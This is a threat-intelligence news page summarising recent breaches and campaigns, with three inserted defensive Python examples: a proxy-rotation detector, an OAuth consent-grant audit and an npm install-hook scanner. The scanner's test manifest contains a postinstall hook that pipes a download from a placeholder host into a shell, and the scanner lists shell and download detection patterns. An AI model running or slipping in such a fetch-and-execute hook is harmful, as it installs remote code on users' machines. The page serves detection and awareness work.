Latest Cybersecurity Threats

Real-time threat intelligence from trusted sources

The Axios HTTP client development team reported that one of its developers fell victim to a social engineering attack, likely orchestrated by North Korean hackers. The attackers used a fake Teams error message to gain access to the developer's account, which in turn allowed them to compromise the project. The incident shows how a single successful social engineering lure against a maintainer can translate into a compromise of widely used open-source software. Users and developers of Axios should be aware of these tactics and harden the accounts and credentials that control their projects. It is also a reminder of the persistent threat posed by state-sponsored hacking groups to open-source maintainers.

Impact: Axios HTTP client, developer accounts
Remediation: Implement multi-factor authentication for accounts, educate users about social engineering tactics, and monitor for suspicious activity.
Read Original

The Qilin ransomware group has claimed responsibility for a data breach involving Die Linke, a left-wing political party in Germany. The group announced that it has stolen sensitive data from the party and is threatening to publish it unless its demands are met. Die Linke has confirmed that an incident occurred but says its own systems were not breached. The case raises concerns about the cybersecurity of political organizations, especially given the sensitive nature of the data involved. The threat of public data leaks can have serious implications for political entities, affecting both their reputation and their operations.

Impact: Die Linke political party
Remediation: N/A
Read Original

A breach involving the European Commission's cloud infrastructure has resulted in the exposure of sensitive data from at least 30 EU entities. The incident was linked to the TeamPCP hacking group, which is known for targeting various organizations. CERT-EU, the Computer Emergency Response Team for the EU, confirmed this breach and made the information public on March 27. This incident raises significant concerns about the security of sensitive government data and the potential for further exploitation of the exposed information. Organizations within the EU must assess their security measures to prevent similar breaches in the future.

Impact: Data from at least 30 EU entities, including sensitive government information.
Remediation: Organizations should review and enhance their cloud security protocols, conduct thorough audits of their systems, and implement robust access controls.
Read Original

The article discusses the shortcomings of data privacy labels for mobile apps, emphasizing that while the concept is beneficial, the current implementations fail to provide clear and useful information to users. Researchers found that inconsistencies in how these labels are presented can lead to confusion about what data is collected and how it is used. This lack of clarity can affect user trust and decision-making regarding app downloads. The article calls for improvements in the labeling process to ensure users are better informed about their privacy. Ultimately, enhancing these labels is crucial for protecting user data and fostering a safer digital environment.

Impact: Mobile apps with privacy labels
Remediation: Improvements in data privacy labeling standards are needed.
Read Original
Actively Exploited

Stryker, a prominent medical device manufacturer in the U.S., has announced that it has fully resumed operations after a cyberattack attributed to the Iran-linked hacktivist group Handala. The attack, which occurred three weeks ago, resulted in the wiping of several of Stryker's systems, disrupting its operations. This incident raises concerns about the security of critical healthcare infrastructure, as such attacks can impact patient care and safety. Stryker's swift recovery is a positive sign, but it highlights the ongoing risks that companies in the healthcare sector face from cyber threats. As the industry becomes more reliant on digital systems, securing these networks is increasingly crucial.

Impact: Stryker's medical devices and internal systems
Remediation: N/A
Read Original
Actively Exploited

Recent findings show that the Akira ransomware group has become more efficient in executing attacks, significantly shortening the time it takes to compromise systems. This development poses a serious risk to organizations, as attackers are now able to exploit vulnerabilities and deploy ransomware more quickly than before. The report from CyberScoop indicates that businesses need to be increasingly vigilant, as traditional defenses may no longer be sufficient against this evolving threat. Companies are urged to review their cybersecurity measures and ensure they are up to date with the latest defenses to mitigate potential attacks. The growing speed of these intrusions could lead to increased financial and operational damage for those caught off guard.

Impact: N/A
Remediation: Organizations should enhance their cybersecurity protocols, including regular software updates, employee training on phishing attacks, and the implementation of advanced threat detection systems.
Read Original

A recent campaign has seen threat actors impersonating CERT-UA, the Ukrainian Computer Emergency Response Team, to distribute AGEWHEEZE malware. This operation has targeted around 1 million users across various sectors, including government, healthcare, education, and finance. By masquerading as a trusted entity, the attackers aim to deceive users into downloading the malicious software, which can lead to data theft and other security issues. The scale of the attack is concerning, as it affects critical sectors that handle sensitive information. Users in these fields should be particularly vigilant about the sources of software downloads and ensure they are only using verified channels.

Impact: CERT-UA impersonation, AGEWHEEZE malware
Remediation: Users should verify the authenticity of software sources and refrain from downloading applications from untrusted sites.
Read Original

A recent study by GreyNoise has revealed that a significant portion of malicious online activity, about 39%, comes from home networks, likely linked to residential proxy services. These proxies allow users to mask their true IP addresses, making it harder for security systems to identify and block malicious traffic. This trend poses a challenge for companies trying to maintain accurate IP reputation systems, as the line between legitimate and malicious traffic blurs. As residential proxies become more common, organizations may find it increasingly difficult to protect themselves from various cyber threats. This situation raises concerns for businesses relying on IP reputation to manage online security.

Impact: IP reputation systems, residential proxy services
Remediation: Organizations are advised to enhance their threat detection capabilities and consider alternative methods for identifying malicious traffic beyond traditional IP reputation systems.
Read Original
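The GreyNoise finding above is about why IP reputation alone breaks down: each residential exit address is used briefly and looks clean on its own. One signal that survives proxy rotation is the client session itself (cookie, token or fingerprint), which stays constant while the source IP churns. The following detector is an added example written for this page, not GreyNoise's code; the ASN table, the log lines and the thresholds are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ASN table (not real data): IP prefix -> (ASN, is_residential).
# A production system would query an ISP/ASN database instead.
ASN_TABLE = {
    "203.0.113.": (64500, True),    # hypothetical residential ISP A
    "198.51.100.": (64501, True),   # hypothetical residential ISP B
    "192.0.2.": (64502, False),     # hypothetical hosting provider
}

# Constructed access log, one request per line:
# "<timestamp> <client_ip> <session_id> <path>"
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 203.0.113.10 sess-A /login
2024-01-01T10:00:05Z 198.51.100.22 sess-A /login
2024-01-01T10:00:09Z 203.0.113.77 sess-A /login
2024-01-01T10:00:14Z 198.51.100.8 sess-A /account
2024-01-01T10:01:00Z 203.0.113.50 sess-B /home
2024-01-01T10:01:30Z 203.0.113.50 sess-B /search
2024-01-01T10:02:00Z 203.0.113.50 sess-B /cart
2024-01-01T10:03:00Z 192.0.2.5 sess-C /login
2024-01-01T10:03:02Z 192.0.2.6 sess-C /login
2024-01-01T10:03:04Z 192.0.2.7 sess-C /login
"""


def lookup_asn(ip):
    """Return (asn, is_residential) for an IP, or (None, False) if unknown."""
    for prefix, info in ASN_TABLE.items():
        if ip.startswith(prefix):
            return info
    return (None, False)


def parse_log(text):
    """Parse log lines into (timestamp, ip, session_id) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, sid, _path = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, sid))
    return events


def per_ip_counts(events):
    """What a pure IP-reputation view sees: requests per source address."""
    counts = defaultdict(int)
    for _ts, ip, _sid in events:
        counts[ip] += 1
    return dict(counts)


def detect_rotating_sessions(events, window=timedelta(minutes=5), min_ips=3):
    """Flag sessions that used >= min_ips distinct residential IPs within `window`.

    The session identity persists while the proxy rotates the exit IP, so the
    churn is visible per session even though every individual IP looks clean.
    """
    by_session = defaultdict(list)
    for ts, ip, sid in events:
        by_session[sid].append((ts, ip))

    flagged = {}
    for sid, hits in by_session.items():
        hits.sort()
        for i, (t0, _ip0) in enumerate(hits):
            # Sliding window starting at each request in the session.
            in_window = [ip for ts, ip in hits[i:] if ts - t0 <= window]
            residential = {ip for ip in in_window if lookup_asn(ip)[1]}
            if len(residential) >= min_ips:
                flagged[sid] = {
                    "distinct_ips": len(set(in_window)),
                    "residential_ips": len(residential),
                    "asns": sorted({lookup_asn(ip)[0] for ip in residential}),
                }
                break
    return flagged


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("per-IP counts:", per_ip_counts(evs))
    print("flagged sessions:", detect_rotating_sessions(evs))
```

In the constructed log, every IP used by sess-A appears exactly once, so no per-IP reputation score would accumulate, yet the session crosses four residential addresses in two ASNs within fourteen seconds. sess-C also rotates, but through hosting space, which is what conventional reputation already catches; the residential filter is what isolates the proxy-service pattern.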
Actively Exploited

Recent analysis has revealed that a malware family known as Chaos is now targeting 64-bit Linux servers, in activity attributed primarily to China-linked groups. Researchers found that the operators employ a two-pronged strategy: one variant acts quickly, while another is built for longer dwell times within compromised systems. This dual approach not only increases the chances of successful infiltration but also makes it harder for organizations to detect and respond to the attacks. Given the prevalence of Linux servers across industries, this development poses a significant risk to a wide range of businesses, potentially leading to data breaches and service disruptions. Companies running Linux servers are urged to enhance their security measures to defend against this escalating threat.

Impact: 64-bit Linux servers
Remediation: Organizations should implement security updates, monitor server activity closely, and consider employing advanced threat detection tools.
Read Original

Hims & Hers Health, a telehealth service provider, has reported a data breach due to stolen support tickets from Zendesk, a third-party customer service platform. This incident raises concerns as it potentially exposes sensitive information from users who sought medical advice or treatment through the service. The company is urging affected users to stay vigilant about their personal information and to monitor their accounts for any suspicious activity. This breach underscores the risks associated with relying on third-party vendors for customer support and handling sensitive data. Users should be aware of possible phishing attempts or unauthorized access to their accounts following this incident.

Impact: Hims & Hers Health user data, Zendesk support tickets
Remediation: Monitor accounts for suspicious activity; users should be cautious of phishing attempts.
Read Original

A Chinese cyber group known as TA416 has been targeting European government and diplomatic entities since mid-2025, resuming its activities after a two-year lull. This campaign employs malware like PlugX and uses OAuth-based phishing techniques to compromise systems. TA416 is linked to various other hacking groups, including DarkPeony and RedDelta, indicating a broader network of cyber threats. The resurgence of these attacks raises concerns about the vulnerability of government institutions in Europe, especially given the increasing geopolitical tensions. Authorities and organizations need to bolster their cybersecurity measures to protect sensitive information from these state-sponsored actors.

Impact: European government and diplomatic organizations
Remediation: Organizations should enhance their cybersecurity protocols, including implementing multi-factor authentication and regular training for employees on recognizing phishing attempts.
Read Original
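The remediation above recommends multi-factor authentication, but OAuth-based phishing is worth a specific check: once a user grants consent to an attacker-controlled application, the attacker holds tokens that were issued after MFA was satisfied, so MFA alone does not undo the grant. The audit below is an added example written for this page, not code from the researchers who tracked TA416. It assumes the OAuth phishing in question is consent-grant abuse, and the grant records, field names and scoring weights are constructed for illustration (the scope names follow Microsoft Graph naming, but the data is not a real tenant export).

```python
# Constructed delegated-permission grants, loosely shaped after what an
# identity tenant exposes. Field names and values are assumptions.
SAMPLE_GRANTS = [
    {
        "app": "Corporate Expense Portal",
        "publisher_verified": True,
        "consent_type": "admin",
        "scopes": ["User.Read", "Files.Read"],
        "days_since_consent": 400,
    },
    {
        "app": "Secure Doc Viewer",          # constructed lure application
        "publisher_verified": False,
        "consent_type": "user",
        "scopes": ["User.Read", "Mail.Read", "Mail.Send", "offline_access"],
        "days_since_consent": 2,
    },
    {
        "app": "Calendar Sync",
        "publisher_verified": True,
        "consent_type": "user",
        "scopes": ["Calendars.Read", "offline_access"],
        "days_since_consent": 90,
    },
    {
        "app": "Internal Helper",
        "publisher_verified": False,
        "consent_type": "user",
        "scopes": ["User.Read"],
        "days_since_consent": 30,
    },
]

# Scopes that let a third-party app read or send on the user's behalf.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read",
}
# offline_access yields a refresh token, so access outlives the session.
PERSISTENCE_SCOPES = {"offline_access"}


def assess_grant(grant):
    """Score one consent grant; higher means more consistent with consent phishing."""
    score, reasons = 0, []
    if not grant["publisher_verified"]:
        score += 2
        reasons.append("unverified publisher")
    if grant["consent_type"] == "user":
        score += 1
        reasons.append("user-granted consent (no admin review)")
    for scope in grant["scopes"]:
        if scope in HIGH_RISK_SCOPES:
            score += 2
            reasons.append(f"high-risk scope {scope}")
        elif scope in PERSISTENCE_SCOPES:
            score += 1
            reasons.append(f"persistent access via {scope}")
    if grant["days_since_consent"] <= 7:
        score += 1
        reasons.append("consented within the last week")
    return score, reasons


def find_risky_grants(grants, threshold=4):
    """Return grants at or above the threshold, highest score first."""
    findings = []
    for grant in grants:
        score, reasons = assess_grant(grant)
        if score >= threshold:
            findings.append({"app": grant["app"], "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for finding in find_risky_grants(SAMPLE_GRANTS):
        print(finding["app"], finding["score"], "; ".join(finding["reasons"]))
```

The response to a hit is to revoke the grant and the app's refresh tokens, not just to reset the user's password, because the application, not the user's credential, is what holds access. Restricting user consent to verified publishers and low-privilege scopes closes the path the scoring is looking for.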
North Korean Hackers Abuse GitHub to Spy on South Korean Firms

Hackread – Cybersecurity News, Data Breaches, AI and More

Actively Exploited

North Korean hackers have launched a significant spying campaign aimed at South Korean companies, according to researchers from FortiGuard Labs. This operation leverages GitHub, a widely used platform for software development, to facilitate their espionage activities. By creating malicious repositories, the attackers are able to trick employees into downloading harmful code that compromises their systems. Companies involved in critical sectors such as technology and defense are particularly at risk. This incident raises alarms about the ongoing threat posed by state-sponsored hacking groups and highlights the need for stronger cybersecurity measures among targeted organizations.

Impact: South Korean technology and defense companies
Remediation: Companies should implement strict access controls, monitor GitHub repositories for suspicious activities, and conduct regular security training for employees to recognize and avoid phishing attempts.
Read Original
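The item above describes malicious repositories used as lures, where the harm comes from running the code rather than reading it. One check a practitioner can run before building an unfamiliar repository is to look at its install-time hooks, since package managers execute lifecycle scripts automatically. The scanner below is an added example written for this page and not the researchers' tooling; it assumes an npm-style package.json (the article does not say which ecosystem the lures used), and both manifests are constructed samples, with the URL in the malicious one pointing at a reserved test domain.

```python
import json
import re

# npm lifecycle scripts that run without the user explicitly invoking them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Patterns that are unusual in a legitimate install hook. Constructed heuristics.
SUSPICIOUS_PATTERNS = [
    (r"\bcurl\b|\bwget\b", "downloads content at install time"),
    (r"\bnode\s+-e\b", "inline JavaScript in a shell hook"),
    (r"\bbase64\b|--decode\b|atob\(", "encoded payload"),
    (r"child_process|\bexec\(|\bspawn\(", "spawns processes"),
    (r"powershell|cmd\.exe|/bin/sh|bash\s+-c|\|\s*(sh|bash)\b", "drops to a system shell"),
    (r"https?://", "contacts a URL"),
]

# Constructed manifests: one with a hostile postinstall hook, one clean.
MALICIOUS_MANIFEST = json.dumps({
    "name": "sdk-demo",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec("
                       "'curl -s http://example.invalid/x | sh')\"",
        "test": "jest",
    },
})

CLEAN_MANIFEST = json.dumps({
    "name": "clean-lib",
    "version": "2.3.1",
    "scripts": {"build": "tsc", "test": "jest", "prepare": "husky install"},
})


def scan_package_json(text):
    """Return one finding per lifecycle hook: its command and matched reasons."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        reasons = [label for pattern, label in SUSPICIOUS_PATTERNS
                   if re.search(pattern, command)]
        findings.append({"hook": hook, "command": command, "reasons": reasons})
    return findings


def is_risky(findings):
    """True if any lifecycle hook matched at least one suspicious pattern."""
    return any(f["reasons"] for f in findings)


if __name__ == "__main__":
    for name, text in (("sdk-demo", MALICIOUS_MANIFEST), ("clean-lib", CLEAN_MANIFEST)):
        findings = scan_package_json(text)
        print(name, "risky" if is_risky(findings) else "no hook findings")
        for f in findings:
            print("  ", f["hook"], "->", f["reasons"] or "no matches")
```

A clean hook such as `husky install` is still reported, just with no reasons, so the reviewer sees every command that will run on install. Running `npm install --ignore-scripts` and then reading the hooks by hand is the low-tech version of the same check.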

The Qilin ransomware group has targeted Die Linke, a German political party, causing significant disruption to its IT systems. This attack not only resulted in a systems outage but also included threats of leaking sensitive data. The party confirmed that data had indeed been stolen during the breach. This incident raises concerns about the security of political organizations, especially in light of upcoming elections and the potential for sensitive information to be weaponized. As cyberattacks against political entities become more common, the implications for privacy and security in the political arena are increasingly serious.

Impact: Die Linke party's IT systems and sensitive data
Remediation: N/A
Read Original

The Trump administration has proposed a budget that includes significant cuts to the Cybersecurity and Infrastructure Security Agency (CISA), amounting to hundreds of millions of dollars. This proposal has drawn sharp criticism from a leading congressional Democrat, who argues that reducing funding for CISA could undermine the nation's cybersecurity efforts. CISA plays a crucial role in protecting the country's critical infrastructure and responding to cyber threats. With the increase in cyberattacks and threats to national security, the proposed cuts raise concerns about the agency's ability to effectively safeguard against these dangers. This budget proposal, if enacted, could have serious implications for the security of government and private sector networks alike.

Impact: CISA
Remediation: N/A
Read Original
AI Firm Mercor Confirms Breach as Hackers Claim 4TB of Stolen Data

Hackread – Cybersecurity News, Data Breaches, AI and More

Actively Exploited

Mercor, an AI firm, has confirmed a significant data breach linked to a supply chain attack involving LiteLLM. Hackers claim to have stolen 4TB of sensitive data, which may include internal systems and proprietary information. This breach raises serious concerns about the security of supply chain processes, as attackers often exploit vulnerabilities in third-party software to gain access to larger networks. Companies that rely on LiteLLM and similar technologies should be particularly vigilant and assess their security measures. The implications of such a large data theft could be severe, affecting not only Mercor but also its clients and partners who may be at risk of data exposure or further attacks.

Impact: LiteLLM supply chain, Mercor's internal systems, sensitive data
Remediation: Companies should review their supply chain security practices, implement stronger access controls, and monitor for unusual activity. Specific patches or updates were not mentioned.
Read Original